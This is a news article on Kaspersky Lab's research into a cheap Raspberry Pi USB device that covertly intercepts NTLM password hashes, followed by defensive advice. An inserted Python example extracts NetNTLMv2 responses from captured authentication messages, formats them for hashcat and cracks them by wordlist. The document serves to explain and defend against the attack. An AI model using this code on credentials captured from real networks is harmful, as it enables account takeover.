Hacking tools for $20

Kaspersky Lab researchers have examined publicly available hardware and software tools for covert password interception and found that a working hacking device can be built for as little as $20.

In the experiment, the researchers used a DIY Raspberry Pi-based USB device, configured in a specific way and carrying no malicious software. Armed with this device, they were able to covertly collect user authentication data from a corporate network at a rate of around 50 password hashes per hour.

The research started with a real story: in another investigation in which Kaspersky Lab experts participated, an insider (an employee of a cleaning company) used a USB stick to infect a workstation inside the targeted organisation with malware. Hearing the story, Kaspersky Lab security enthusiasts became curious: what else could an insider use to compromise a targeted network, and would it be possible to compromise a network without any malware at all?

They took a Raspberry Pi microcomputer, configured it to present itself to the host as a USB Ethernet adapter, made some additional configuration changes in the OS running on the microcomputer, and installed a few publicly available tools for packet sniffing, data collection and processing. Finally, the researchers set up a server to receive the intercepted data. Once the device was connected to the targeted machine, it began automatically feeding stolen credential data to that server.

This worked because the OS on the attacked computer identified the connected Raspberry Pi as a wired LAN adapter, automatically gave it a higher priority than the other available network connections and, more importantly, let it take part in the machine's network data exchange. The experimental network simulated a segment of a real corporate network. As a result, the researchers were able to collect authentication data sent by the attacked PC and its applications as they tried to authenticate to domain and remote servers. They were also able to collect such data from other computers in the same network segment.

Moreover, because the intercepted data was sent over the network in real time, the longer the device stayed connected to the PC, the more data it collected and forwarded to the remote server. After just half an hour the researchers had collected nearly 30 password hashes passing through the attacked network, so it is easy to imagine how much could be collected in a single day. In the worst case, a domain administrator's authentication data could be intercepted if they logged into their account while the device was plugged into one of the PCs in the domain.

The potential attack surface for this method of data interception is large: the experiment was reproduced successfully on both locked and unlocked computers running Windows and Mac OS. The researchers were not, however, able to reproduce the attack on Linux-based devices.

“There are two major things that we are worried about as a result of this experiment: firstly – the fact that we didn’t really have to develop the software – we used tools freely available on the Internet. Secondly – we are worried about how easy it was to prepare the proof of concept for our hacking device. This means that potentially anyone, who is familiar with the Internet and has basic programming skills, could reproduce this experiment. And it is easy to predict what could happen if this was done with malicious intent. The latter is the main reason why we decided to draw public attention to this problem. Users and corporate administrators should be prepared for this type of attack”, said Sergey Lurye, a security enthusiast and co-author of the research at Kaspersky Lab.

Although the attack intercepts password hashes rather than plaintext passwords (a hash is the fixed-length output of a one-way function applied to the password), the captured hashes are still dangerous: challenge-response hashes can be cracked offline by guessing candidate passwords, because the algorithms are public, and an account's NT hash, once obtained, can be replayed directly in pass-the-hash attacks without being cracked at all.
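To make concrete both the "data collection and processing" step described above and the claim that captured hashes can be cracked because the algorithms are public, here is an added example. It is not Kaspersky Lab's code and not the unnamed tools they used; it reconstructs an NTLMv2 challenge-response (the kind of "password hash" a Windows client sends when it authenticates to a server over NTLM) from an NTLMSSP AUTHENTICATE_MESSAGE laid out as in MS-NLMP, formats it the way offline cracking tools expect, and recovers the password by guessing. The user name jdoe, domain CORP, workstation WS01, server challenge, client blob, password and wordlist are all constructed for the demonstration; MD4 is implemented inline because many current Python builds no longer ship it in hashlib.

```python
"""Reconstruct and crack an NTLMv2 challenge-response taken off the wire.
Added example, not Kaspersky Lab code; all sample values are constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds often remove hashlib's md4."""
    rounds = (  # (boolean function, additive constant, shifts, word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + f(b, c, d) + w[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates "d"
        h = [(u + v) & MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password; this is what pass-the-hash replays."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password, user, domain, challenge, blob):
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, upper(user)+domain), challenge+blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()


def build_authenticate(user, domain, workstation, nt_response):
    """Minimal NTLMSSP AUTHENTICATE_MESSAGE (type 3): empty LM response, no MIC."""
    payload, fields = b"", []
    for item in (b"", nt_response, domain.encode("utf-16-le"),
                 user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""):
        fields.append(struct.pack("<HHI", len(item), len(item), 64 + len(payload)))
        payload += item  # 64 = fixed header size, so offsets point into payload
    flags = struct.pack("<I", 0x00088205)  # UNICODE|REQUEST_TARGET|NTLM|ALWAYS_SIGN|EXT_SESSIONSECURITY
    return b"NTLMSSP\x00" + struct.pack("<I", 3) + b"".join(fields) + flags + payload


def parse_authenticate(msg: bytes) -> dict:
    """Extract user, domain and the NTLMv2 response from a type 3 message."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")

    def field(pos):  # length/maxlength/offset descriptor at header position pos
        length, _, offset = struct.unpack_from("<HHI", msg, pos)
        return msg[offset:offset + length]

    nt_resp = field(20)
    if len(nt_resp) <= 24:  # exactly 24 bytes would be NTLMv1, a different format
        raise ValueError("NTLMv1 response; this example handles NTLMv2 only")
    return {"user": field(36).decode("utf-16-le"), "domain": field(28).decode("utf-16-le"),
            "proof": nt_resp[:16], "blob": nt_resp[16:]}


def hashcat_line(auth: dict, challenge: bytes) -> str:
    """NetNTLMv2 in the form hashcat -m 5600 / john --format=netntlmv2 accept."""
    return (f"{auth['user']}::{auth['domain']}:{challenge.hex()}:"
            f"{auth['proof'].hex()}:{auth['blob'].hex()}")


def crack(auth: dict, challenge: bytes, wordlist):
    """Offline guessing: the algorithm is public, so only the password is unknown."""
    for candidate in wordlist:
        proof = ntlmv2_proof(candidate, auth["user"], auth["domain"], challenge, auth["blob"])
        if hmac.compare_digest(proof, auth["proof"]):
            return candidate
    return None


# Constructed sample: server challenge, a client blob (header, timestamp, client
# nonce, reserved; AV pairs omitted) and a victim who uses a weak password.
SERVER_CHALLENGE = bytes.fromhex("0102030405060708")
CLIENT_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4
SAMPLE_MESSAGE = build_authenticate(
    "jdoe", "CORP", "WS01",
    ntlmv2_proof("Summer2017", "jdoe", "CORP", SERVER_CHALLENGE, CLIENT_BLOB) + CLIENT_BLOB)


def demo():
    """Parse the captured message, emit the cracker line, and recover the password."""
    auth = parse_authenticate(SAMPLE_MESSAGE)
    line = hashcat_line(auth, SERVER_CHALLENGE)
    return line, crack(auth, SERVER_CHALLENGE, ["password", "Welcome1", "Summer2017"])
```

Two practical points follow from the code. The NTLMv2 response is bound to the server challenge, so a captured response cannot itself be replayed as a pass-the-hash credential; it has to be cracked, and at the rates the article reports, a wordlist of common corporate passwords will do that for every weak account within hours. The NT hash, by contrast, is what pass-the-hash replays, which is why the administrator advice below to move domain authentication to Kerberos removes the captured material at its source rather than merely making it harder to crack.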

To protect a computer or network against attacks using similar DIY devices, Kaspersky Lab security experts recommend the following:

For regular users:

  1. On returning to your computer, check whether any unfamiliar USB devices are plugged into its ports.
  2. Avoid accepting flash drives from untrusted sources; such a drive could in fact be a password interceptor.
  3. Make a habit of ending sessions on sites that require authentication. Usually, this means clicking a "log out" button.
  4. Change passwords regularly, both on your PC and on the websites you use frequently. Remember that not all of your favourite websites protect against cookie substitution. Specialised password management software, such as the free Kaspersky Password Manager, makes it easy to manage strong, unique passwords.
  5. Enable two-factor authentication, for example login confirmation or a hardware token.
  6. Install and regularly update a security solution from a proven and trusted vendor.

For system administrators:

  1. If the network topology allows it, use only the Kerberos protocol for authenticating domain users, so that no NTLM challenge-response traffic is available to capture.
  2. Prevent privileged domain users, especially domain administrators, from logging into legacy systems.
  3. Domain user passwords should be changed regularly. If, for whatever reason, the organisation's policy does not require regular password changes, change the policy.
  4. Every computer in the corporate network must be protected by a security solution and kept up to date.
  5. To prevent the connection of unauthorised USB devices, a Device Control feature, such as the one in the Kaspersky Endpoint Security for Business suite, can be useful.
  6. If you own a web resource, enable HSTS (HTTP Strict Transport Security), which prevents a browser from being downgraded from HTTPS to HTTP, so that session cookies cannot be captured in plaintext and replayed.
  7. If possible, enable client (AP) isolation on Wi-Fi routers and the corresponding port isolation on switches, so that workstations cannot listen to one another's traffic.
  8. Enable DHCP snooping on switches so that rogue DHCP servers cannot answer users' DHCP requests.

Besides intercepting authentication data from a corporate network, the experimental device can also be used to collect browser cookies from the attacked machines.

Copyright © 2018 World Wide Worx